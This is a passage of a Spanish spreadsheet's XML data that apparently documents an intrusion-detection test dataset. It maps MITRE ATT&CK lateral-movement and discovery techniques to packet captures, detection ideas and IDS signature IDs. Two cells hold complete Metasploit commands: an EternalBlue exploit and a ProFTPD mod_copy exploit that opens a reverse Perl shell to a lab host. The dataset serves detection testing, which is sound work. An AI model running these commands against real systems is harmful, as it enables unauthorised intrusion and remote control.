    <t>Regla genérica para detectar conexiones SSH entre un orígen y un servidor o destino dentro de la red a proteger.                                                               *Este ataque, si bien es detectable por red, es idéntico a un acceso legítimo, por lo que no es posible diferenciar uno de otro (salvo por anomalías relacionadas con direcciones IP o usuarios poco comunes)</t>
  </si>
  <si>
    <t>Manual [3] / 3.8.10</t>
  </si>
  <si>
    <t>Manual [3] / 3.8.10.4</t>
  </si>
  <si>
    <t>Manual [4] / 4.1.48</t>
  </si>
  <si>
    <t>Exploitation of Remote Services</t>
  </si>
  <si>
    <t>T1210</t>
  </si>
  <si>
    <t>EternalBlue</t>
  </si>
  <si>
    <t>T1210-Eternal_blue_[2].pcapng</t>
  </si>
  <si>
    <t>Regla genérica que detecte uso de EternalBlue</t>
  </si>
  <si>
    <t>Uso de exploit Eternalblue para obtener movimiento lateral y establecimiento de meterpreter. Comando: msfconsole -x "use exploit/windows/smb/ms17_010_eternalblue; set RHOSTS 192.168.2.2; set LHOST 192.168.1.3; run -z; sessions -c getuid; sessions -k 1; exit"</t>
  </si>
  <si>
    <t>Manual [2] /  3.1.7.1</t>
  </si>
  <si>
    <t>Manual [4] / B.29</t>
  </si>
  <si>
    <t>Manual [2] / 4.1.1.4</t>
  </si>
  <si>
    <t>2102465, 2025992, 2025649, 2025650, 42944</t>
  </si>
  <si>
    <t>44487, 44485, 44489, 5730, 42944, 2102465, 2025992, 2025649, 2025650</t>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2002752, 2002749</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>, 2044666, 2023997, 2044665, 2102465, 2025992, 2025649, 2025650, 2024766, 42944, 44487, 44485, 44489, 5730</t>
    </r>
  </si>
  <si>
    <t>2044666, 2023997, 2044665, 2102465, 2025992, 2025649, 2025650, 2024766, 42944, 44487, 44485, 44489, 5730</t>
  </si>
  <si>
    <t>43799, 43963, 43796</t>
  </si>
  <si>
    <t>Ataque Web</t>
  </si>
  <si>
    <t>DVWA, In-house selenium framework</t>
  </si>
  <si>
    <t>T1210-Web_attack-C2018_[6].pcapng</t>
  </si>
  <si>
    <t>Manual [4] / B.36</t>
  </si>
  <si>
    <t>Ejecución de código remoto basado en vulnerabilidades de servidor FTP</t>
  </si>
  <si>
    <t>T1210-Remote_code_execution_[2].pcapng</t>
  </si>
  <si>
    <t xml:space="preserve">Regla genérica que detecte intento de ejecucion remota de codigo en servidor FTP </t>
  </si>
  <si>
    <t>Uso de comandos SITE/CPFR/CPTO en la version 1.3.5 de ProFTPD  que permite copiar ficheros a cualquier usuario no autenticado. Comando: msfconsole -x "use exploit/unix/ftp/proftpd_modcopy_exec; set RHOSTS 192.168.2.2; set SITEPATH /var/www/html; set LHOST 192.168.1.3; set LPORT 4444; set payload cmd/unix/reverse_perl; run -z; sessions -c ls; sessions -k 1; exit"</t>
  </si>
  <si>
    <t>Manual [2] /  3.1.7.2</t>
  </si>
  <si>
    <t>Manual [4] / B.30</t>
  </si>
  <si>
    <t>Manual [2] /  4.2.1.9</t>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>34225, 34447, 34224,</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve"> 50447</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>34225, 34447, 34224,</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve"> 50447</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2002752, 2002749</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve">, 2010732, 34225, 34447, 34224, </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>50447</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve">2010732, 34225, 34447, 34224, </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>50447</t>
    </r>
  </si>
  <si>
    <t>Remote Service Session Hijacking</t>
  </si>
  <si>
    <t>T1563</t>
  </si>
  <si>
    <t>RDP Hijacking</t>
  </si>
  <si>
    <t>T1563.002</t>
  </si>
  <si>
    <t>Secuestro de sesión RDP mediante tscon.exe</t>
  </si>
  <si>
    <t>tscon.exe</t>
  </si>
  <si>
    <t>T1563.002_RDPHijacking_[5].pcapng</t>
  </si>
  <si>
    <t>Regla genérica para detectar conexiones RDP entre un orígen y un servidor o destino</t>
  </si>
  <si>
    <t>Uso de Windows Server 2012 R2 con DNS, Active Directory y Servicio de Escritorio Remoto</t>
  </si>
  <si>
    <t>Manual [5] /  3.5.7.1</t>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve">2002752,  2002749, 2001117, </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>1448</t>
    </r>
  </si>
  <si>
    <t>Lateral Tool Transfer</t>
  </si>
  <si>
    <t>T1570</t>
  </si>
  <si>
    <t>Transferencia de herramientas para la continuación del ataque entre máquinas utilizando protocolos de compartición de archivos</t>
  </si>
  <si>
    <t>T1570-Lateral_Tool_Transfer_[5].pcapng</t>
  </si>
  <si>
    <t>Transferencia mediante FTP de ficheros entre dos equipos</t>
  </si>
  <si>
    <t>Manual [5] /  3.5.7.2</t>
  </si>
  <si>
    <t>Internal Spear-phishing</t>
  </si>
  <si>
    <t>T1534</t>
  </si>
  <si>
    <t>Phishing interno entre equipos pertenecientes a un dominio con servidor de correo habilitado</t>
  </si>
  <si>
    <t>MailEnabler, Thunderbird</t>
  </si>
  <si>
    <t>T1534-Internal_spearphishing_[4].pcapng</t>
  </si>
  <si>
    <t>Detección por anomalías, análisis de la estructura de correos electrónicos, petición de información confidencial, etc</t>
  </si>
  <si>
    <t>Manual [4] /  3.14</t>
  </si>
  <si>
    <t>Manual [4] / B.14</t>
  </si>
  <si>
    <t>Manual [4] / 4.14</t>
  </si>
  <si>
    <t>TA0007</t>
  </si>
  <si>
    <t>Network Service Discovery</t>
  </si>
  <si>
    <t>T1046</t>
  </si>
  <si>
    <t>Descubrimiento de servicios y version</t>
  </si>
  <si>
    <t>Nikto</t>
  </si>
  <si>
    <t>T1046-Version_services_detection1_[3].pcapng</t>
  </si>
  <si>
    <t>Múltiples mecanismos. Por ejemplo, regla que detecte un escaneo de puertos (alto número de peticiones hacia un rango de puertos en poco tiempo)</t>
  </si>
  <si>
    <t>Manual [3] /  3.8.3</t>
  </si>
  <si>
    <t>Manual [3] / 3.8.3.4</t>
  </si>
  <si>
    <t>Manual [3] / 3.8.3.5</t>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve">2002677, </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2101071</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>, 2101242, 2027262, 2016141, 2101129, 2100987,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t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve">2002677, </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2101071</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>, 2101242, 2027262, 2016141, 2101129, 2100987,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t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve">50447, 300003, 31940, 2002677, </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2101071</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve">, 2101242, 2027262, 2016141, </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2101129</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve">, </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2100987</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>,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t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve">50447, 300003, 31940, 2002677, </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2101071</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve">, 2101242, 2027262, 2016141, </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2101129</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve">, </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2100987</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>,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t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve">50447, 300003, 31940, 2002752, 2002749, 2002677, </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2101071</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve">, 2101242, 2027262, 2016141, 2003595, </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2101129</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve">, </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2100987</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>, 2027265, 2027250, 2018752, 2027263, 2009885, 2101245, 2100971, 2027253, 2101852, 2101145, 2010767, 2010766, 2102056, 2101288, 2101738, 2009151, 2001343, 2100993, 2101256, 2003099, 2101016, 2019714, 2101402, 2014379, 2011031, 2049400, 2009362, 2009361, 2101002, 2101945, 2101401, 2101829, 2012911, 2030337, 2101244, 2101122, 2100988, 2049401, 2001949, 2012913, 2011042, 2010963, 2006446, 2006445, 2011040, 2009714, 2001218, 2101827, 2004589, 2019526, 2004592, 2101877, 2101108, 2100915, 2016184, 2009001, 2020296, 2002731, 2100937, 2100952, 2100977, 2100958, 2100961, 2100965, 2101847, 2101111, 2011141, 2011144, 2011142, 2011143, 2002070, 2021390, 2101201, 2101013, 2101193, 2101023, 2101487, 2101018, 2101372, 2009485, 2009884, 2102073, 2102131, 2049402, 2101156, 2101874, 2100953, 2100951, 2100959, 2101110, 2101489, 2100981, 2100982, 2101403, 2101332, 2002133, 2016182, 2011696, 2010377, 2009435, 2003670, 2011564, 2009167, 2010095, 2009317, 2009318, 2003740, 2009397, 2002681, 2010920, 2009931, 2009848, 2009321, 2010475, 2009311, 2009313, 2012795, 2009382, 2009367, 2009757, 2009758, 2009759, 2009755, 2009756, 2009760, 2009754, 2009466, 2009467, 2009468, 2009384, 2009059, 2009060, 2009061, 2009062, 2009877, 2009391, 2009369, 2012369, 2002879, 2010485, 2008897, 2009871, 2009872, 2009873, 2009196, 2003738, 2010099, 2003699, 2017442, 2009459, 2009898, 2009166, 2003677, 2003682, 2003704, 2010260, 2009933, 2012013, 2008826, 2009307, 2009051, 2010354, 2002815, 2009788, 2010027, 2003678, 2003679, 2009225, 2010252, 2008833, 2010355, 2009793, 2003731, 2009163, 2003688, 2003696, 2009892, 2009398, 2002800, 2003703, 2100884, 2003729, 2003728, 2003727, 2003726, 2009316, 2009101, 2010197, 2008904, 2008903, 2010276, 2008900, 2008901, 2008902, 2010126, 2003671, 2010466, 2003739, 2003333, 2008922, 2009427, 2002902, 2008871, 2003680, 2017441, 2003698, 2003701, 2008879, 2010362, 2009381, 2009386, 2010473, 2009188, 2009903, 2008899, 2009180, 2003737, 2003717, 2003517, 2009932, 2011274, 2003732, 2003733, 2003718, 2003700, 2003689, 2009364, 2010124, 2010564, 2010125, 2002996, 2003331, 2011384, 2011259, 2003672, 2003673, 2003674, 2003675, 2003676, 2017440, 2009415, 2003660, 2003661, 2003664, 2010484, 2003662, 2009372, 2003663, 2003665, 2003666, 2003667, 2003668, 2003681, 2003694, 2002898, 2009887, 2003705, 2003706, 2003707, 2003708, 2003715, 2003709, 2003711, 2003713, 2003712, 2003710, 2003714, 2003867, 2003693, 2009370, 2009371, 2008964, 2009504, 2009502, 2009723, 2003702, 2009325, 2009326, 2008962, 2009164, 2003720, 2003719, 2003721, 2009123, 2009506, 2009229, 2003741, 2003743, 2003744, 2003745, 2009071, 2008996, 2009179, 2019524, 2002901, 2009333, 2009733, 2003669, 2009656, 2009653, 2009378, 2009717, 2009379, 2014180, 2010254, 2003716, 2017436, 2003692, 2003747, 2003686, 2009190, 2011160</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve">50447, 300003, 31940, 2002677, </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2101071</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve">, 2101242, 2027262, 2016141, 2003595, </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2101129</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve">, </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2100987</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>, 2027265, 2027250, 2018752, 2027263, 2009885, 2101245, 2100971, 2027253, 2101852, 2101145, 2010767, 2010766, 2102056, 2101288, 2101738, 2009151, 2001343, 2100993, 2101256, 2003099, 2101016, 2019714, 2101402, 2014379, 2011031, 2049400, 2009362, 2009361, 2101002, 2101945, 2101401, 2101829, 2012911, 2030337, 2101244, 2101122, 2100988, 2049401, 2001949, 2012913, 2011042, 2010963, 2006446, 2006445, 2011040, 2009714, 2001218, 2101827, 2004589, 2019526, 2004592, 2101877, 2101108, 2100915, 2016184, 2009001, 2020296, 2002731, 2100937, 2100952, 2100977, 2100958, 2100961, 2100965, 2101847, 2101111, 2011141, 2011144, 2011142, 2011143, 2002070, 2021390, 2101201, 2101013, 2101193, 2101023, 2101487, 2101018, 2101372, 2009485, 2009884, 2102073, 2102131, 2049402, 2101156, 2101874, 2100953, 2100951, 2100959, 2101110, 2101489, 2100981, 2100982, 2101403, 2101332, 2002133, 2016182, 2011696, 2010377, 2009435, 2003670, 2011564, 2009167, 2010095, 2009317, 2009318, 2003740, 2009397, 2002681, 2010920, 2009931, 2009848, 2009321, 2010475, 2009311, 2009313, 2012795, 2009382, 2009367, 2009757, 2009758, 2009759, 2009755, 2009756, 2009760, 2009754, 2009466, 2009467, 2009468, 2009384, 2009059, 2009060, 2009061, 2009062, 2009877, 2009391, 2009369, 2012369, 2002879, 2010485, 2008897, 2009871, 2009872, 2009873, 2009196, 2003738, 2010099, 2003699, 2017442, 2009459, 2009898, 2009166, 2003677, 2003682, 2003704, 2010260, 2009933, 2012013, 2008826, 2009307, 2009051, 2010354, 2002815, 2009788, 2010027, 2003678, 2003679, 2009225, 2010252, 2008833, 2010355, 2009793, 2003731, 2009163, 2003688, 2003696, 2009892, 2009398, 2002800, 2003703, 2100884, 2003729, 2003728, 2003727, 2003726, 2009316, 2009101, 2010197, 2008904, 2008903, 2010276, 2008900, 2008901, 2008902, 2010126, 2003671, 2010466, 2003739, 2003333, 2008922, 2009427, 2002902, 2008871, 2003680, 2017441, 2003698, 2003701, 2008879, 2010362, 2009381, 2009386, 2010473, 2009188, 2009903, 2008899, 2009180, 2003737, 2003717, 2003517, 2009932, 2011274, 2003732, 2003733, 2003718, 2003700, 2003689, 2009364, 2010124, 2010564, 2010125, 2002996, 2003331, 2011384, 2011259, 2003672, 2003673, 2003674, 2003675, 2003676, 2017440, 2009415, 2003660, 2003661, 2003664, 2010484, 2003662, 2009372, 2003663, 2003665, 2003666, 2003667, 2003668, 2003681, 2003694, 2002898, 2009887, 2003705, 2003706, 2003707, 2003708, 2003715, 2003709, 2003711, 2003713, 2003712, 2003710, 2003714, 2003867, 2003693, 2009370, 2009371, 2008964, 2009504, 2009502, 2009723, 2003702, 2009325, 2009326, 2008962, 2009164, 2003720, 2003719, 2003721, 2009123, 2009506, 2009229, 2003741, 2003743, 2003744, 2003745, 2009071, 2008996, 2009179, 2019524, 2002901, 2009333, 2009733, 2003669, 2009656, 2009653, 2009378, 2009717, 2009379, 2014180, 2010254, 2003716, 2017436, 2003692, 2003747, 2003686, 2009190, 2011160</t>
    </r>
  </si>
  <si>
    <t>Existen 6270 rutas diferentes en el escaneo de rutas. Es decir, 6270 mensajes HTTP GET. Snort detecta el uso de Nikto para el escaneo web y detecta el acceso a diferentes rutas y intentos de diferentes ataques (Ejemplo SID 2009325) que no se corresponden con el ataque realizado. En FortiGate hay que descartar las alertas relacionadas con la herramienta usada, por lo que detectan 208 instancias de ataque</t>
  </si>
  <si>
    <t>44780, 12648, 15229, 15463, 46767, 27560, 43336, 12015, 30908, 13106, 24975, 13011, 18057, 15621, 10574, 34971, 12577, 10181, 12758, 12709, 12979, 50825, 12980, 10003, 48010, 15117, 29613, 14946, 15091, 14950, 14857, 14956, 13825, 14947, 15115, 29615, 15100, 14740, 30542, 14157, 15092, 14949, 15118, 29564, 14742, 15110, 14230, 10819, 14737, 14953, 15114, 14341, 29614, 14948, 32033, 29965, 31752, 47202</t>
  </si>
  <si>
    <t>T1046-Version_services_detection2_[3].pcapng</t>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve">384, 453, 408, 451, 1421, 1420, 1418, 257, </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>598</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve">384, 453, 408, 451, 1421, 1420, 1418, 257, </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>598</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2010937, 2010939, 2010938</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>, 2002911</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve">, 2010936, 2010935, </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2002910</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>, 2100257, 2100598, 2009358, 2024364, 384, 453, 408, 451, 1421, 1420, 1418, 257, 598</t>
    </r>
  </si>
  <si>
    <t>2010937, 2002910, 2010935</t>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve">2010939, 2010938, 2010936, </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2002910</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>, 2100257, 2100598, 2009358, 2024364, 384, 453, 408, 451, 1421, 1420, 1418, 257, 598</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2010937, 2010939, 2010938, 2002911, 2010936, 2010935, 2002910, 2100257, 2100598,</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve"> 2</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve">009358, </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2024364, 384, 453, 408, 451, 1421, 1420, 1418, 257, 598, 36650, 13586, 50447</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2010939, 2010938, 2010936, 2100257, 2100598</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve">, </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2009358</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>, 2024364, 384, 453, 408, 451, 1421, 1420, 1418, 257, 598, 36650, 13586, 50447</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2100469, 2100384, 2002752, 2002749,</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve"> 2009582, 2000538,</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve"> 2100453, 2100408, 2100451, 2</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve">010937, </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve">2001689, </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve">2010939, </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve">010938, </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve">002911, </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>2100615, 2</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t xml:space="preserve">010936, </t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>20</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>10935, 2</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>0</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>02910, 2</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>101420, 2101418, 21</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>00257, 2</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>1</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>00598, 20</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>09</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FFFF0000"/>
        <sz val="11.0"/>
      </rPr>
      <t>358, 2024</t>
    </r>
    <r>
      <rPr>
        <rFont val="Arial, sans-serif"/>
        <color rgb="FF000000"/>
        <sz val="11.0"/>
      </rPr>
      <t>364, 384, 453, 408, 451, 1421, 1420, 1418, 257, 598, 36650, 13586, 50447</t>
    </r>
  </si>
  <si>
    <t>2100384, 2002752, 2100615, 2009582, 2100469, 2010935, 2100408, 2010937, 2002749, 2002910, 2002911</t>
  </si>
  <si>
    <r>
